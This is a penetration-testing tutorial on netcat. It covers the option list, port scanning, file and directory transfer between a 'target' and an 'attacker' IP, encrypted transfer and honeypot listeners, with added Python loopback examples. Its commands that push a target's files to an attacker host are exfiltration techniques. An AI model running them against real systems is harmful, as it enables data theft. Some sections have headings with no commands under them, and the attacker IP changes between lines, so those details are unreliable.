I have been doing penetration testing for several years, and over the course of projects I have found that while solid penetration skills matter, getting more out of a test is impossible without powerful tools. Even the strongest tester cannot, in my view, complete a penetration test entirely by hand; after all, penetration testing is still largely manual labor.
Some people now think penetration testing is getting easier, because open source automation tools are appearing in large numbers and the existing ones keep improving. Even someone who knows nothing about security can run a tool and find plenty of vulnerabilities, sometimes even gaining access automatically. I admit that today's automated tools have lowered the entry barrier to this industry, but that does not mean penetration testing is becoming easier.
My first reason is that security is a long game: technology never stands still, and security techniques always run ahead of security tools. Relying only on tools can make a penetration test hard to carry out, because defenses are updated constantly while the attacking side depends on tools that lag behind, so the results are predictable. Second, the powerful penetration tools on the market today require some foundation to use; they are not fool-proof, and using a good tool well is not easy. In short, I personally think penetration testing will only get harder, and as enterprises across the country pay more attention to security, the burden on practitioners' shoulders will only grow.
All of that preamble is just to introduce the theme of this series: penetration tools. The reason I want to write up the tools I use during penetration tests is simple: a craftsman who wants to do good work must first sharpen his tools, nothing more.
As the first article in this series, this one introduces an enduring penetration tool, the one reputed to be the Swiss Army knife: nc. Most of the content comes from the Internet, so readers familiar with the old material can skip it. I try to record every aspect of using nc, mainly for my own reference; criticism is welcome.
Introduction to Netcat
nc, short for netcat, is known as the Swiss Army knife of network tools: it can read and write data across a network over TCP and UDP, and it is very powerful.
Linux and macOS ship with nc installed by default; run nc -h at the command line to view the help.
On Windows, the nc.exe tool can be downloaded.
Run nc -h to view the help:
-h          show this help
-d          background (detached) mode
-g gateway  source-routing hop point[s], up to 8
-G num      source-routing pointer: 4, 8, 12, ...
-e prog     redirect the connection to a program [dangerous]
-i secs     delay interval between lines sent and ports scanned
-l          listen mode, for inbound connections
-L          listen harder: keep listening after a connection closes, until Ctrl+C
-n          numeric IP addresses only, no DNS (do not resolve domain names)
-o file     hex dump of the traffic to a file
-p port     local port number
-s addr     local source address
-r          randomize local and remote ports
-t          Telnet interactive mode (answer Telnet negotiation)
-u          UDP mode
-v          verbose output; -vv is more verbose
-w secs     timeout for connections and final network reads
-z          zero-I/O mode (used for scanning)
PortScan (port scanning)
Basic TCP scan:
Set the delay and specify the ports to scan:
Listen on a port on the target:
Connect to that port from this machine:
Listen on a port on this machine:
Connect to that port from the target:
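As an added example (not code from the original post), here is a Python equivalent of the -z / -w / -i scan described above, useful for checking which ports a host of your own actually exposes. The loopback listener, the free-port helper and the demo ports are the example's own constructions.

```python
import socket
import time


def scan_ports(host, ports, timeout=1.0, delay=0.0):
    """Connect-only scan, the equivalent of nc -z -v -w <timeout> -i <delay>.
    Returns {port: "open" | "closed" | "filtered"}: a refused connection means
    closed, a timeout means a firewall dropped the SYN or the host is down."""
    results = {}
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)                # -w secs
        try:
            sock.connect((host, port))
            results[port] = "open"
        except ConnectionRefusedError:
            results[port] = "closed"
        except OSError:                         # includes TimeoutError
            results[port] = "filtered"
        finally:
            sock.close()                        # -z: no data is ever exchanged
        if delay:
            time.sleep(delay)                   # -i secs between ports
    return results


def demo():
    """Loopback demo (constructed): one listening port and one port nothing listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))                  # port 0: let the OS pick a free port
    srv.listen(1)
    open_port = srv.getsockname()[1]
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                               # freed again, so connects are refused
    results = scan_ports("127.0.0.1", [open_port, closed_port], timeout=0.5, delay=0.1)
    srv.close()
    return open_port, closed_port, results


if __name__ == "__main__":
    print(demo())
```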
Download a file from the target machine
Here this machine plays the target (it only has an internal IP, so the scenario is simulated) and 126.96.36.199 is the attacker; the goal is to download a file from the target to the attacker.
Target machine: nc.exe 188.8.131.52 9999 < H:\test.txt (sends test.txt from the target's H: drive to port 9999 on the attacker)
Attacker: nc.exe -d -l -p 9999 > test.txt (saves whatever arrives on local port 9999 as test.txt; start this listener before running the command on the target)
Upload a file to the target machine
Attacker: nc -d -l -p 9990 <test2.txt
Target machine: nc 184.108.40.206 9990> test2.txt
Capturing port data (packets)
Combined with other commands, nc's capabilities can be greatly expanded.
Encrypted transmission of data
Server: $ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Client: $ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567
Note that ECB mode encrypts identical plaintext blocks to identical ciphertext blocks and provides no integrity or authentication, so this only hides the file's contents from a casual observer; for anything sensitive, tunnel nc through SSH or use an authenticated encryption mode.
Transferring a whole directory works the same way with tar:
Target machine: $ tar -cvf - dir_name | nc -l 1567 (packs dir_name and serves the archive on port 1567)
Attacker: $ nc -n 10.0.0.2 1567 | tar -xvf - (connects, receives the stream and unpacks it)
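nc moves raw bytes and never tells you whether what arrived is what was sent. As an added example (not code from the original post) for the file transfer and directory transfer sections above, the following Python pair plays the same listener/connector roles but appends a SHA-256 digest so the receiver can detect corruption or truncation; the length-prefixed frame, the loopback demo and the tamper switch are the example's own constructions.

```python
import hashlib
import os
import socket
import struct
import tempfile
import threading


def send_file(host, port, path, tamper=False):
    """Connecting side, the nc HOST PORT < file role. Frame (this example's own
    convention, plain nc just sends raw bytes): 8-byte length, data, SHA-256."""
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).digest()
    if tamper:                                  # simulate corruption in transit
        data = data[:-1] + bytes([data[-1] ^ 0xFF])
    with socket.create_connection((host, port)) as s:
        s.sendall(struct.pack("!Q", len(data)) + data + digest)


def receive_file(listener, out_path):
    """Listening side, the nc -l -p PORT > file role; True only if the digest matches."""
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as stream:
        (size,) = struct.unpack("!Q", stream.read(8))
        data = stream.read(size)
        digest = stream.read(32)
    with open(out_path, "wb") as f:
        f.write(data)
    return hashlib.sha256(data).digest() == digest


def transfer_demo(payload, tamper=False):
    """Run both sides on loopback with a constructed file; returns (ok, bytes received)."""
    with tempfile.NamedTemporaryFile(delete=False) as src:
        src.write(payload)
    dst = src.name + ".received"
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)                               # start the listener first, as with nc
    out = {}
    t = threading.Thread(target=lambda: out.update(ok=receive_file(lst, dst)))
    t.start()
    send_file("127.0.0.1", lst.getsockname()[1], src.name, tamper)
    t.join()
    lst.close()
    received = open(dst, "rb").read()
    for p in (src.name, dst):
        os.unlink(p)
    return out["ok"], received
```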
- nc -L -p 80 as honeypot 1: open port 80 and keep listening on it until Ctrl+C
- nc -L -p 80 > c:\log.txt as honeypot 2: open port 80 and keep listening on it until Ctrl+C, writing everything received to c:\log.txt
- nc -L -p 80 < c:\honeyport.txt as honeypot 3-1: open port 80 and keep listening on it until Ctrl+C, feeding the contents of c:\honeyport.txt into each connection; this also doubles as a way of transferring a file
- type.exe c:\honeyport | nc -L -p 80 as honeypot 3-2: open port 80 and keep listening on it until Ctrl+C, piping the contents of c:\honeyport.txt into each connection; this also doubles as a way of transferring a file
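As an added example (not code from the original post), this Python listener does what the -L honeypot variants above do, and additionally records who connected, when, and what they sent first, which is the information a defender actually wants from a honeypot. The banner, the probe requests and the loopback demo are the example's own constructions; a real deployment would bind the exposed interface and port 80.

```python
import datetime
import socket
import threading


def make_listener(host="127.0.0.1", port=0):
    """Bind and listen. Port 0 lets the OS pick a free port; a real
    deployment would bind the exposed interface and a port such as 80."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, port))
    srv.listen(5)
    return srv


def honeypot(listener, banner=b"", max_connections=None, log_path=None):
    """Re-listening loop in the spirit of nc -L -p 80 > log.txt < honeyport.txt: answer
    each connection with `banner`, record peer, time and the first bytes it sent."""
    records = []
    while max_connections is None or len(records) < max_connections:
        conn, peer = listener.accept()      # -L: accept again after each close
        with conn:
            conn.settimeout(2.0)            # a silent peer must not hang the loop
            conn.sendall(banner)            # the '< honeyport.txt' part
            try:
                first = conn.recv(1024)
            except socket.timeout:
                first = b""
        records.append({"time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
                        "peer": "%s:%d" % peer, "data": first})
        if log_path:                        # the '> log.txt' part: one line per hit
            with open(log_path, "a") as log:
                log.write("%(time)s %(peer)s %(data)r\n" % records[-1])
    return records


def demo(n=2, banner=b"HTTP/1.0 200 OK\r\n\r\n"):
    """Loopback demo with n constructed probes; returns (records, replies)."""
    srv = make_listener()
    port = srv.getsockname()[1]
    out = {}
    t = threading.Thread(target=lambda: out.update(recs=honeypot(srv, banner, n)))
    t.start()
    replies = []
    for i in range(n):
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(b"GET /probe%d HTTP/1.0\r\n\r\n" % i)
            replies.append(c.recv(64))
    t.join()
    srv.close()
    return out["recs"], replies
```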